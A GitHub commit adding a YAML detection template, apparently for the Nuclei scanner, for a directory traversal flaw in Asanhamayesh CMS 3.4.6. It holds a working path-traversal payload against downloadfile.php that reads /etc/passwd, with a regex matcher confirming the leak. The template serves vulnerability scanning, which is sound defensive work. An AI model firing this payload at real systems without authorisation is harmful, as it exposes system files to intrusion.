Create asanhamayesh-cms-lfi.yaml

patch-1
Roberto Nunes 2021-12-16 21:56:43 +09:00 committed by GitHub
parent fbf0b448be
commit d4e38b00e3
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 24 additions and 0 deletions

24
asanhamayesh-cms-lfi.yaml Normal file
View File

@ -0,0 +1,24 @@
id: asanhamayesh-cms-lfi
info:
name: Asanhamayesh CMS 3.4.6 Directory traversal Vulnerability
author: 0x_Akoko
severity: high
reference: https://cxsecurity.com/issue/WLB-2018030006
tags: asanhamayesh,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/downloadfile.php?file=../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200